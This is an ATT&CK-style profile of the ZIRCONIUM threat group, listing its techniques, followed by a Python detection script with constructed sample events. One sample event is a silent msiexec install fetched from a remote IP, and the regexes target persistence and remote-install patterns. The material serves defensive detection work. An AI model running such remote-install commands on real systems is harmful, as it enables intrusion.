Description
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)
Techniques Used (TTPs)
- T1082 — System Information Discovery (discovery)
- T1598 — Phishing for Information (reconnaissance)
- T1012 — Query Registry (discovery)
- T1665 — Hide Infrastructure (command-and-control)
- T1059.003 — Windows Command Shell (execution)
- T1583.006 — Web Services (resource-development)
- T1584.008 — Network Devices (resource-development)
- T1555.003 — Credentials from Web Browsers (credential-access)
- T1059.006 — Python (execution)
- T1547.001 — Registry Run Keys / Startup Folder (persistence, privilege-escalation)
- T1573.001 — Symmetric Cryptography (command-and-control)
- T1124 — System Time Discovery (discovery)
- T1140 — Deobfuscate/Decode Files or Information (defense-evasion)
- T1598.003 — Spearphishing Link (reconnaissance)
- T1566.002 — Spearphishing Link (initial-access)
- T1583.001 — Domains (resource-development)
- T1033 — System Owner/User Discovery (discovery)
- T1090.003 — Multi-hop Proxy (command-and-control)
- T1041 — Exfiltration Over C2 Channel (exfiltration)
- T1036 — Masquerading (defense-evasion)
- T1567.002 — Exfiltration to Cloud Storage (exfiltration)
- T1027.002 — Software Packing (defense-evasion)
- T1204.001 — Malicious Link (execution)
- T1036.004 — Masquerade Task or Service (defense-evasion)
- T1068 — Exploitation for Privilege Escalation (privilege-escalation)
- T1218.007 — Msiexec (defense-evasion)
- T1105 — Ingress Tool Transfer (command-and-control)
- T1016 — System Network Configuration Discovery (discovery)
- T1102.002 — Bidirectional Communication (command-and-control)
Total TTPs: 29
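The list above names techniques but does not show what they look like in host telemetry. The following is an added example, not MITRE content and not ZIRCONIUM tooling: a small Python pass that flags three of the listed techniques (T1547.001 Registry Run Keys, T1218.007 Msiexec, T1059.006 Python) over constructed Sysmon-style process-creation and registry-set records. Every path, host address and event record is invented for the demonstration, and the heuristics are generic rules a detection engineer would tune against a real baseline, not indicators attributed to this group.

```python
"""Constructed detection pass for three ZIRCONIUM-associated techniques.

Added illustration (not MITRE or group material). Events are hand-built to
resemble normalised Sysmon records; adjust the field names to your pipeline.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Event:
    """One normalised telemetry record (constructed for this example)."""
    kind: str            # "process" (process creation) or "registry" (value set)
    image: str = ""      # full path of the created process
    cmdline: str = ""    # command line of the created process
    key: str = ""        # registry key path for "registry" events
    value: str = ""      # data written to that key


# Autostart locations covered by T1547.001: HKCU/HKLM, Wow6432Node, Run and RunOnce.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
# Directories an unprivileged user can write to; autostarts and interpreters
# launched from here deserve a closer look than anything under System32.
USER_WRITABLE = re.compile(
    r"^[A-Z]:\\(?:Users\\[^\\]+\\|ProgramData\\|Windows\\Temp\\)", re.IGNORECASE
)
# msiexec asked to install a package fetched over HTTP(S) (T1218.007 proxy execution).
MSI_REMOTE = re.compile(r"(?:/i|/package|-i)\s+\"?https?://", re.IGNORECASE)


def detect(ev: Event) -> list[str]:
    """Return the ATT&CK technique IDs whose heuristic this event triggers."""
    hits: list[str] = []
    if ev.kind == "registry":
        data = ev.value.strip().strip('"')
        # Run-key value pointing at a user-writable binary: benign autostarts
        # overwhelmingly live under Program Files or System32.
        if RUN_KEY.search(ev.key) and USER_WRITABLE.match(data):
            hits.append("T1547.001")
    elif ev.kind == "process":
        name = ev.image.rsplit("\\", 1)[-1].lower()
        if name == "msiexec.exe" and MSI_REMOTE.search(ev.cmdline):
            hits.append("T1218.007")
        # A Python interpreter that itself lives in a user-writable path is a
        # common shape for a dropped, self-contained runtime.
        if name in ("python.exe", "pythonw.exe") and USER_WRITABLE.match(ev.image):
            hits.append("T1059.006")
    return hits


def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> technique hits, omitting events with no hits."""
    results: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample telemetry: three true positives interleaved with three
# look-alike benign events that the heuristics must leave alone.
SAMPLE_EVENTS = [
    Event("registry", key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          value=r'"C:\Users\alice\AppData\Roaming\Updater\updater.exe"'),
    Event("registry", key=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
          value=r"C:\Windows\System32\SecurityHealthSystray.exe"),
    Event("process", image=r"C:\Windows\System32\msiexec.exe",
          cmdline=r"msiexec.exe /q /i http://198.51.100.7/update/pkg.msi"),
    Event("process", image=r"C:\Windows\System32\msiexec.exe",
          cmdline=r"msiexec.exe /i C:\Users\bob\Downloads\7zip.msi"),
    Event("process", image=r"C:\Users\alice\AppData\Local\Temp\py\pythonw.exe",
          cmdline=r'pythonw.exe -c "import socket"'),
    Event("process", image=r"C:\Program Files\Python311\python.exe",
          cmdline=r"python.exe build.py"),
]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx} ({ev.kind}): {', '.join(hits)} <- {ev.key or ev.cmdline}")
```

These three techniques were chosen because each leaves a crisp artifact in standard telemetry. The registry rule deliberately ignores Run values that point into system directories, where most legitimate autostarts live, and the msiexec rule keys on a remote package URL rather than on any msiexec invocation, which would be far too noisy on a managed fleet.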